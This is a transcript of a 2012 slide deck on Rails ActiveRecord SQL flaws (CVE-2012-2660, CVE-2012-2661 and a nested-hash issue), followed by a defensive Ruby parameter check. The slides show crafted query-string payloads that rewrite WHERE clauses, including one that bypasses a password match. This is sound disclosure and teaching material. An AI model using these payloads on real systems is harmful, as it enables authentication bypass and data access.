"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661

CVE-2012-2660
Allows unexpected "IS NULL" in queries. Affects Rails 2.x and 3.x.

ActiveRecord Query:
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query Parameters: ?name[]
  {"name"=>[nil]}

ActiveRecord Query (with the parameters above substituted in):
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys. Affects Rails 3.x.

ActiveRecord Query:
  User.where(:name => params[:name])

ActiveRecord Query:
  User.where("users.name" => params[:name])

Query Parameters: ?name[users.id]=1
  {"name"=>{"users.id"=>"1"}}

ActiveRecord Query (with the parameters above substituted in):
  User.where(:name => {"users.id" => "1"})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values. Affects Rails 2.3.x and 3.x.

ActiveRecord Query:
  User.where(:name => params[:name], :password => params[:password])

Query Parameters: ?name[users][id]=1&password[users][id]=1
  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (with the parameters above substituted in):
  User.where(:name => {"users" => {"id" => "1"}}, :password => {"users" => {"id" => "1"}})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
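All three issues share one root cause: the parameter shapes Rack produces for `name[]`, `name[users.id]=1` and `name[users][id]=1` are an Array or a Hash, and hash-form `where` interprets those structurally instead of as a value. The following is an added defender-side example, not code from the deck, showing a check that admits only plain String parameters before they reach `where`; the parsed-parameter hashes are constructed by hand to mirror the deck's query strings, and `safe_scalar` and `build_conditions` are hypothetical helper names.

```ruby
# Added example (not from the slides): reject the non-scalar parameter shapes
# that CVE-2012-2660, CVE-2012-2661 and the nested-hash issue rely on, before
# the value is handed to ActiveRecord's hash-form `where`.

# Return the parameter only if it is a plain String. Arrays (?name[]),
# hashes (?name[users.id]=1, ?name[users][id]=1) and nil are all rejected,
# which is stricter than the slide's `unless params[:name].nil?` check.
def safe_scalar(params, key)
  value = params[key]
  value.is_a?(String) ? value : nil
end

# Build the conditions hash for `Model.where(...)`, keeping only the columns
# whose parameter passed the scalar check. An empty hash means nothing usable
# was supplied, so the caller can refuse to run the query at all.
def build_conditions(params, *keys)
  keys.each_with_object({}) do |key, conditions|
    value = safe_scalar(params, key.to_s)
    conditions[key] = value if value
  end
end

# Constructed inputs mirroring what Rack parses from the deck's query strings.
PARAMS_IS_NULL = { "name" => [nil] }                            # ?name[]
PARAMS_DOTTED  = { "name" => { "users.id" => "1" } }            # ?name[users.id]=1
PARAMS_NESTED  = { "name" => { "users" => { "id" => "1" } },    # ?name[users][id]=1&
                   "password" => { "users" => { "id" => "1" } } } #   password[users][id]=1
PARAMS_NORMAL  = { "name" => "alice", "password" => "s3cret" }  # ordinary scalar values

if __FILE__ == $0
  [PARAMS_IS_NULL, PARAMS_DOTTED, PARAMS_NESTED, PARAMS_NORMAL].each do |p|
    puts "#{p.inspect} -> #{build_conditions(p, :name, :password).inspect}"
  end
end
```

Only the last input yields a non-empty conditions hash; the three attack-shaped inputs all come back empty, so the `IS NULL`, dotted-key and nested-hash rewrites never reach the SQL builder.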